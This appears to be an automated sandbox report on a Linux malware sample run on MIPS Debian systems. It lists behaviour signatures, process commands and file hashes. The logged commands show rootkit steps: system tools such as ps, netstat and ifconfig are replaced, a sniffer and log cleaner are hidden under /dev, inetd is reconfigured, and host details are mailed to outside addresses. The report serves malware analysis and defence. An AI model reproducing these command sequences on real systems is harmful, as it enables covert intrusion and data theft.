SHA256 7c6df4a77640bcd68644dc88e9803d9fb624249a7f1e763f80f5621842d68fab
SHA512 a6a5c511ea21465dc32c136a84e10294dd19e144f9daa5c3786d99ae85f48601e3a0ce246aa2ffb419a827ba40b8abea4a3ce462df232ed3f9912d59a3a1e097

/var/spool/exim4/msglog/1t2jH0-0000Dm-5G

MD5 4e316fae543f4b051d53d645873c27bc
SHA1 677b9dfee1f769816fb960546485415118105d2a
SHA256 907e5d5d4c190f40b67ef1451310b86c26f671ca571c7d45bbbbb3ee212b3fcd
SHA512 cf18a02fa5028746a94ce9f2065f08f4951c4bc2a18fbc5dbc1cc2e06bed09f780720546399072704686cb0444ec04b9fe4d5cfcfe8db7292434c1599bcfddbb

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-21 05:39

Reported

2024-10-21 05:41

Platform

debian9-mipsbe-20240729-en

Max time kernel

30s

Max time network

32s

Command Line

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

Signatures

Enumerates running processes

Virtualization/Sandbox Evasion: Time Based Evasion

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/uptime N/A
N/A N/A /usr/bin/uptime N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/123/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/704/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/331/stat /usr/bin/killall N/A
File opened for reading /proc/848/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/700/cmdline /usr/bin/killall N/A
File opened for reading /proc/748/stat /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/425/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/123/cmdline /usr/bin/killall N/A
File opened for reading /proc/701/cmdline /usr/bin/killall N/A
File opened for reading /proc/152/cmdline /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/exim4 N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/exim4 N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/337/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/uptime N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/713/stat /usr/bin/killall N/A
File opened for reading /proc/110/stat /usr/bin/killall N/A
File opened for reading /proc/675/stat /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/247/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/716/stat /usr/bin/killall N/A
File opened for reading /proc/172/stat /usr/bin/killall N/A
File opened for reading /proc/708/cmdline /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/uptime N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/122/stat /usr/bin/killall N/A
File opened for reading /proc/334/stat /usr/bin/killall N/A
File opened for reading /proc/686/stat /usr/bin/killall N/A
File opened for reading /proc/848/cmdline /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/700/stat /usr/bin/killall N/A
File opened for reading /proc/707/stat /usr/bin/killall N/A
File opened for reading /proc/self/mountinfo /bin/df N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/707/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /bin/mv N/A
N/A N/A /sbin/ifconfig N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/grep N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/mv N/A
N/A N/A /sbin/ifconfig N/A
N/A N/A /bin/grep N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/computer /tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 N/A
File opened for modification /tmp/mup8k2Yg /usr/bin/mail N/A
File opened for modification /tmp/mu4jyQB7 /usr/bin/mail N/A
File opened for modification /tmp/mubyrMXg /usr/bin/mail N/A
File opened for modification /tmp/mufGZHz6 /usr/bin/mail N/A
File opened for modification /tmp/muvgRZWW /usr/bin/mail N/A
File opened for modification /tmp/muAoNLeb /usr/bin/mail N/A
File opened for modification /tmp/muuYdpXh /usr/bin/mail N/A
File opened for modification /tmp/mus5KVAr /usr/bin/mail N/A

Processes

/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

/usr/bin/clear

[clear]

/bin/chown

[chown root.root 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-9fuBn9]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep inet]

/usr/bin/uptime

[uptime]

/bin/grep

[grep vendor_id]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/bin/cat

[cat /proc/cpuinfo]

/bin/df

[df -h]

/bin/cat

[cat computer]

/usr/bin/mail

[mail -s placinte [email protected]]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-mipsbe-20240729-en-2 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGU-0000Cf-HU]

/usr/bin/mail

[mail -s roote [email protected]]

/bin/cat

[cat computer]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-mipsbe-20240729-en-2 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGU-0000Cf-HU]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGW-0000Cp-8E]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGW-0000Cr-Es]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

/usr/bin/clear

[clear]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGW-0000Cp-8E]

/bin/chown

[chown root.root bin boot dev etc home initrd.img initrd.img.old lib lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinux vmlinux.old]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGY-0000D1-JD]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/bin/grep

[grep inet]

/sbin/ifconfig

[/sbin/ifconfig]

/usr/bin/uptime

[uptime]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep vendor_id]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/grep

[grep bogomips]

/bin/cat

[cat /proc/cpuinfo]

/bin/df

[df -h]

/usr/bin/mail

[mail -s placinte [email protected]]

/bin/cat

[cat computer]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-mipsbe-20240729-en-2 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGi-0000EP-Hf]

/usr/bin/mail

[mail -s roote [email protected]]

/bin/cat

[cat computer]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGi-0000EP-Hf]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-mipsbe-20240729-en-2 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGl-0000ET-NH]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGm-0000EU-Jj]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGm-0000EU-Jj]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGo-0000Ed-F4]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsbe-20240729-en-2 udp

Files


MD5 ca2fbb75a9ba20bc27a1d8af4d41adde
SHA1 72f8b918eda79bdf4bc9682904b614035e2d7975
SHA256 282fab896f56bdc59cff78abe2f64d3faa085cfc24acddf841fac3a68309410d
SHA512 bfac843c9559ed5395b54f81231ad550c59fde64d909cd52fd34a9abcd6f6048f18cfcc1e32cdbc55d6ef42ea33cfd1fd7abb49bd70ffad9dfddd847ab0e611b

/var/spool/exim4/msglog/1t2jGW-0000Cr-Es

MD5 78745f4ba05af9d73f90a7efba873e9c
SHA1 3185246f32de574eee7043179cbd908e288fd63c
SHA256 d85919aaf568004c1b7e45a6709bc25840716ced2443967e72ca9745c2238c93
SHA512 5971da97702197e429ef313ba28fc56f9c5a18064a149800e2eb50ae6fa26bbf68eaf14122eaf08caddfffe1f3b6ddd1374e53afbf7c5108d54f0a277e295d49

/var/spool/exim4/input/hdr.790

MD5 8123e34a605ba1384e0dcc54b71da0d2
SHA1 067e00a52a471aef3f88283077556dda1fa6310b
SHA256 d99ccdd1fbf82baec01459cccd2be3f83a8b7d0ded61f63318c1a4d30535d7c7
SHA512 290805dff106861b8155ea686f6db5f6c1c6dff5d5aff185fd47bf4e1fcd204f67e47f157ac713c859ece3d8526cbeeb73b92559c697c08c4cfe6eae3f3c1b70

/var/spool/exim4/msglog/1t2jGW-0000Cp-8E

MD5 0ea06ec44aecb5e0294e4026b8a0f242
SHA1 c2fda5935919f1855a70e5242ae36f7af38e2d5d
SHA256 f3d6f6d8cd372d67fe11b4d96fd26b4c28808fba4ca5029b4dab2afeb91abfea
SHA512 b2249c8e62fb48191c8c09487bfd4a1601fa717b647962da812ec11ed9176b7ccf09cffafeaf82e49d1ed7d0fc36f1341665ec987e89b29d6d9d113b3a200fc7

/var/mail/user

MD5 23b3270454f0c8dc39d67d17d502c161
SHA1 6b67e2b2fbf2ec987c95d5e9e7ea9814982470ae
SHA256 aaae7163b7505ed5ae7a26669b35fb10d9a665c9254155b9b5770497a93fd2fd
SHA512 08225b28128ae450634b07c4b139302c41cff5cfb956f8d734d12e8edd114c98b103f5cb5eb67f7d427203642a33993c8f2f74eaec4ca879ef3028b5bee26276

/var/spool/exim4/input/1t2jGW-0000Cr-Es-J

MD5 d7d96d63d643a4ce3e408eba7dfcedc5
SHA1 c53607f95c5c57beafc1d8266646797a035f76ea
SHA256 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

/var/spool/exim4/msglog/1t2jGW-0000Cr-Es

MD5 f3be0f19bff259e0194781119b7d44c9
SHA1 fa0f047c1d2e5cd594882cc39ee8917b25086aaf
SHA256 887a20ebcf4da88858748c1bea99a0f292ec7f8081323eb40e30f313fd2c2bd6
SHA512 8af3ba373d1b697a9dfff3f35fca53f177029ec91a5dd239ca6116348aab2a841e5ba8512f1a0bce04043ae61e1c41dfd82f0d23c70d0ea40ca69400a7d2c486

/var/spool/exim4/input/1t2jGY-0000D1-JD-D

MD5 2712e6b0887733a699fed993225db397
SHA1 37162182c2b1f444ef5ab321ae71e62e8cd96334
SHA256 0187c9400cddfd6be65546ce32583d0e67b181db43794a9d38c8f3fd92a7824b
SHA512 fea638242cf0f1196e57c343aa22c2f3e746c9d618dc3160b230956209a9d3980e44842ee33f2ba781db2d79604b4636b7a1a5e007bb1c19923a5459743d63e6

/var/spool/exim4/input/hdr.807

MD5 9a9a70eb243a0b7c6eea5a5434119aec
SHA1 d657dd2f0fc77fd8220093f86ce05dfeebcd0b6f
SHA256 0638c0970f7516d1c01ef4454c24120eeca4065683a1c12110ac88b34b19d1ea
SHA512 b2b905ca574fb69053f42c8af51056907f7da911decdb0172fe100bfe70d4acc5871e5529ebe969e12e128ce17f070d5bf7799842ef7847decad1f93b878738f

/var/spool/exim4/msglog/1t2jGY-0000D1-JD

MD5 a7b7a74bd9904f0600e51be008ef3359
SHA1 3c590c832f1e1c9b5369ccc362913ee8213bca89
SHA256 7d561c821931ba02e5a4e2cb5ad132a12f356b580cebe2373e68d412d72f02d1
SHA512 2ebcbaf25f272e61d2efe37b9c18408fc837c74323290b940b191d47e254b67d0a3765625e40d96e13ed68edc24cbe59cf09440f3d2641eb4a827218cfe419ee

/var/spool/exim4/input/hdr.800

MD5 d1650e93e40c9473c2e6b9abf083b47f
SHA1 196146df65756d1006748f8cfb6464d1d2e0936d
SHA256 0d4095f2f90979832e011642da6443f1c661ce2afba6b1288a3bbbbb94f9646f
SHA512 f05dab17e4dbda8203d11efaec298c33f86661a94e249785245a44616ef5a5b39e1f1e0789b533dd106a0c841304467ced22f0ef317edf29cfe0c75029486727

/var/mail/user

MD5 e358c7b5d7fd98df061e02420e774538
SHA1 92f8224fb9577638892dc39e2441bf61292217b0
SHA256 194640549c2e6fdd92ba3548dc0c9895551f1d8ffa715840bfcda8f3d6a372e3
SHA512 b48ffb556b286518d431baf30a2bde6a1bd55e5af330a83fe7e004944bdba3bbc1a21964cebadcfe6461bfe372f32ee2063ba477892c228f9f1375bd463663d7

/var/spool/exim4/msglog/1t2jGY-0000D1-JD

MD5 330ea5468f8578f0206d57b26985aa11
SHA1 3582aaeb9aaa9ef88eed41c07996b51461a3b980
SHA256 d69cf3564bf77f8fc0b1cef7f49f8815819bc8159413d8eeafc0d22a7def0664
SHA512 e4c7808d4b3006f9607bbb957a7ecf065d88298873938136b7e4892460e2e80cf6559316bc5bb5b232f7d859c187be3de2e1111200dd7ba9825b126672dabfb1

/computer

MD5 2a4270da036540595d16930eded05157
SHA1 6e3b0043fd2492294cd1e07608d44f9888bf2d8a
SHA256 dcb110667a5619f2a662b617df27317ca98196ca9cd9e45a0c81a23512858f88
SHA512 5a5aaf7085b4e3ce6ac4b7bc17bc4ce77fa26037a8b30396a6522d46511486d9f0ab1530f45fee1114ec6713b0fb5d9706f2d5c87d70f8661d4e313514bb559a

/computer

MD5 7f4cb9ccf09825d48496b71597db9750
SHA1 af1299512a0ad5ff537ec5e8af89977c6bdd9568
SHA256 6442aa905c6baf27da4b5f8ecd23d7d22f92323eb3bc74d8d915c97fa16eff4c
SHA512 904281fc535e248df7e937ff7727f13a86a06a2787fa1c69933389bcfd6e0fd8bbd4fb7bd890c21bf816dc7d7d50d2b05c5abeec48c0cf98b632621ee87bb140

/computer

MD5 e1e18ba76cbd2f5fe075cec09d9357d6
SHA1 278c24b29e7dd36a29ff45a4ebd6cdf23b6ec63e
SHA256 0ab8e7b12f358fec2cc1ddc2537ffd4ab2887b7f689ae48103605a73bd20440a
SHA512 429397adb71d29633ee2bcb1e1e54cb68a9895cbc170ec6a6300e9585b9fd152ff6fbb83a3aaed7ee144c1822f1721aec2822c5e3aa546e679cc4275da43242e

/var/spool/exim4/input/1t2jGi-0000EP-Hf-D

MD5 99768ab00927b702cd361427b18306f8
SHA1 cc4b02222a72e69ef96d5d134cb6825aabe9915e
SHA256 62652fdd0b664661e0df5a33d7fea8ee498695926b7b1f7c6fcf16c74a1e5f1d
SHA512 7bb6e18a44c28f41530ec5c1449c3c167e05225698a80984b2aab49d64b400d0d0b9bf61db0aba6ecb8f98f6161be4f4ae7424a7c580733d46436d5feb531b8a

/var/spool/exim4/input/hdr.893

MD5 9fa86bcb4991ee0015fb4e5138248e58
SHA1 5574bf55de8e91683d98ca2bca10a62cb47a50ac
SHA256 e36f896fa8e271ebcca9e0fe04c7046508ac90decc5b0716f340d1022f9825d8
SHA512 68a79cc280e56a4aca222c0239f7bf732b4486ed5e089fbc22568ece753a9e94cd5fecd57af2aac4c83397c761bfc62a707bd60565dd5d0781a62450fc411c33

/var/spool/exim4/msglog/1t2jGi-0000EP-Hf

MD5 128fd8e55ffff2b183e9e54dd7749132
SHA1 f7ce80325121447780002e7a2f404411bb3f272f
SHA256 a954b433f919114995b2514cbdfa9cecf6563832736169ba4a7aef3dd2c8bb8b
SHA512 28aa1d8c4f44fd641e3f46e067d5e71bc8ee8796884620958d099700844c163f76c718a000db1e214e6c599a0d93852b6388032baa9ef8d1411669d017aafa3e

/var/spool/exim4/msglog/1t2jGi-0000EP-Hf

MD5 f762b7d12159efe0a15dd85e9220874c
SHA1 62fab2a845c317cb955307a3e0291c1b8fdb5f42
SHA256 8a3e2c4a0cf583123cb0e17862fc838f4b3a025c42a3dc332866eaa390ff472d
SHA512 a5c528880f0a0a2eb469b977c320adaf0f8553386a9d1b3e04421daf17157c935569d9d15c02c2dcf73ec2d64b7509609633cb20f7e6026da42ca6e9efd0fdef

/var/spool/exim4/input/1t2jGl-0000ET-NH-D

MD5 3ce4fbaaf3765d8d1459398b17c413c4
SHA1 4a9b67f2aa431a26792a8e99597976a5bbb426b8
SHA256 eb656a182f847a902b2b384c6456078f15c1fe54dc88cd2daf9d3435b577c388
SHA512 fcad23ac88eabd6529e32e2cba1c1eb93889af7d085cd439e257f6058dec0e526bf15bb0f743e670e2e78a89eab8580159c70282984f6b95e67846419d711c73

/var/spool/exim4/input/hdr.897

MD5 5493516437aec402b0a9adf664235605
SHA1 bb8a0f36fb27c0f62a3668b88054ba8e06b06a7e
SHA256 a5a3dca07507e2ce821bd532348018f0558ea31108f203bdc38f70a7a1194f44
SHA512 dce6998a4451398943cd0e84162c898bcd2d8f1834c7e53e98f7911e38e249331e76770e3fa18f2f2399197b149673919c0a5415baa6f2c45e710a4d2b2c0900

/var/spool/exim4/msglog/1t2jGl-0000ET-NH

MD5 d8f0f9c7ff7aeda2088efcba18e7db6e
SHA1 85fda667ea56b739f790eb6889f20853ff42a2ec
SHA256 1cfcc9997be4c747e78b6a62c14c2a662eff386492bdfbc872006ecfc45c52ba
SHA512 14c796cdf2458ab61109684a28a158b20695be02ec13a8bc862d6de8b0f9f89878be9658e50303c9ee19245e55f91d2a38e9cce9aaceb9a1f8dafe0e5a7a6738

/var/spool/exim4/input/hdr.894

MD5 f6c6269029f2d6f04892f9ee0b7b3933
SHA1 0aa018c92dfc858aaf63eca5487540f09e7017e0
SHA256 6070d84d6513ca5e16ca7daf23f9ce82ac492e3debbab28e89bf72445c4de5e5
SHA512 490e45eb17f59ea2be4571ed016a4efe8c1382783a12f0a8706e5c685c3367c936c7d361c488160e67bebdc80dadc79bf43aa7cc617f49684b685bf540fbbab3

/var/spool/exim4/input/1t2jGm-0000EU-Jj-D

MD5 74224335dff2abe0a998b1f06805bfba
SHA1 8c360cb35892029092f98c46c3ee223298386e56
SHA256 da619bbacb247f4942ae47f157c9853330df09567a08fbddc6558d13262cc7e3
SHA512 629e194701d5dae54de0a58b27b190855a8358fdd7a5450559f7e0caa1e9c9a872fb217fa1914c9bc135dbf90068cf58632e7b63a0da852b2344c5a4863b7fba

/var/spool/exim4/input/hdr.898

MD5 1c91bc2b8fe5e4b2126a75477b5f11a2
SHA1 95b847a016ef750dc84b2dbaa1c8e59b5d32f79d
SHA256 4abd61a1102ded34c1c144bef2ff3d86ef8230458723f18c1340984a8d9fd001
SHA512 ef4c33b5e932db52013084204c998c23a287f6b840ec49898bc7695cf9bb4db47fa082c52ddadb2eae23f1afca97b0948006c74f55bf107c231b08dff6de46d7

/var/spool/exim4/msglog/1t2jGm-0000EU-Jj

MD5 dfb48b402911b99b2076f781c15167e3
SHA1 9bc90714a93c8825077d2082bf8e5666cbea78a4
SHA256 26f76d38be381ec91978da1c2c65086e8779ac25d73c47e48b89e3d37043d414
SHA512 9a0d6e057ae89ebca65aa09ea9800ed61d53962ed7c762d18b5d24021454f69c0d9f769c511325ff06f22b2d18c6d18cd16fe4db4a69db75000b2735c3628be1

/var/mail/user

MD5 7aac3cb8530ef5c9713885e5bccf1edf
SHA1 f5778d27d83c63243485ffa857e29e76eda9d9db
SHA256 aee2160de7249117ea7b1df6229341b61dc73685a94dc36b535837c72fede8f1
SHA512 c09a2b747681b97867c6dd48360626c2faa6add728393c489a1af6b3f3ef014a8806a160d21a67a7d93822fa37c58b15850b0eccefe23f1948cc018718540075

/var/spool/exim4/msglog/1t2jGl-0000ET-NH

MD5 882cfa1ba576b75757f379a649c96253
SHA1 755c5be3fd808ce6adef9e46660a62a8714e58cf
SHA256 f36785f4194fa85b2627cd521d73c48a99fe7d249b592635e42b1ca12da6ab6e
SHA512 246dfe97ae32943a40328cf96bbe1be19218429a8e3c2396c589b04fdf2a818186dcac1106ab8230ff7a0b6d3136fc6eb7412290e4d47828e9e584a2f9c6a005

/var/spool/exim4/msglog/1t2jGm-0000EU-Jj

MD5 a80aa0e0a1bd8fa3dd53d3854415681f
SHA1 fb3e43709d0bbc0d3a4d231bf2007b33ffffe574
SHA256 f2d77f27173f6641e57624329b818f112cd631c75c6b6c2716c942cf8dff326f
SHA512 0b2044e661376fa5be51095234074a77bd2f2b3bb04eb1d61a69b398ef91e2b7485665072be9e4d93fb797f8d54f3a003e6ba6657ff7d73a67729911b1434297

/var/spool/exim4/input/1t2jGo-0000Ed-F4-D

MD5 3a1108b0ce7b5984bc59d938a4585296
SHA1 947d7947ae20ed3c43ab3dbd693b643e05407532
SHA256 8cb2bd31ae6ef5dd60c93935355e72f2b8fefe0a3556780668e01f562f6cdc8f
SHA512 54b337a0350649aebf41378137ecd6e65f17d2c1b7b9a5a40443d0d55cc6ee6a10fb6b76485624fc8768c0ddbb4f0458675dfdc74502f9faef5ad1826d18a142

/var/spool/exim4/input/hdr.907

MD5 6a335a6b63391a1b071e6d9eba0d8616
SHA1 a1792f14340afbe82b9c4b7e555642275253a67a
SHA256 c0a70d6b8d4dd0770947e04434065e837e26fce0676ef01a358dd685e350478f
SHA512 8e85ec6f3e4639b2717b4cfeb99085b93b23bcde4de532f3295d7dcfeea837e53968e84aab9b6af95ec03d2e0290a427d3c128d4fd1ab69ec66316257a6077c9

/var/spool/exim4/msglog/1t2jGo-0000Ed-F4

MD5 a8a7118dc8c70e84db5bb36e5bed5652
SHA1 2c5545cf4c63591677d6608832f00319dc63cca2
SHA256 360150e5acc75ef1e1a393b818c18ae5028edf7cf5fcf3914a7d5d69fcdf840e
SHA512 fe04ab8bac57cb73052b53d12d2ed9f14765359870f871c1f9c8b368fe3579ecae80ccbae5f890a0827a1b432effcee8e1488c73ab216ce0ad05e4d81ac4c591

/var/spool/exim4/input/hdr.900

MD5 484c74ac02d39af1d57873d4bd54088a
SHA1 022005e2fb548d8b14414dbc90a8f093bb74521f
SHA256 8c827018ed222445ac66d8a30b3ec0d4714f33bf50a00440df8fbd9a00eb31ec
SHA512 4f6583a1872aa127815cb4303c38219a7768723a6d0a29301e34dc9488fb9abd01eaebceab9706b8ed36694820a40e9fe73351a4c0314a7143059d125c9d85a0

/var/mail/user

MD5 fec4fb676da868075ad1377020cd4db3
SHA1 3db64670976039d8a778f678023698a91106045d
SHA256 33fd4863191978a815e7f530ff8ebdc14051ddbf36ae4078d9773b81e2312893
SHA512 42eebf2d792debd96d9da242b9ae66c13218467904e85fdbd8a98db784c0a4b00a704d26f6cd27e1ccbac37465937824a1c0acc17fa7895ffa6f2365559405e5

/var/spool/exim4/msglog/1t2jGo-0000Ed-F4

MD5 3ceb6e2dc163f26b927165690cb2425c
SHA1 5b1f313aa65f57d6f30e3f0ad9a3f6615488afe2
SHA256 888c7f62582a27a69e25911086642d7ca26bf9654f3ee931ebb5adf91a2887c9
SHA512 834cffbf2d7b0f42d32ba6a309f87af75d1c0456910bfe2031833dc01f42aef5e5b7ebf3d7092305eebe184e985603b71dad39c61ce3fae32d3c1bd33812c2ac

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-21 05:39

Reported

2024-10-21 05:41

Platform

debian9-mipsel-20240418-en

Max time kernel

32s

Max time network

33s

Command Line

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

Signatures

Enumerates running processes

Virtualization/Sandbox Evasion: Time Based Evasion

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/uptime N/A

Checks CPU configuration

antivm
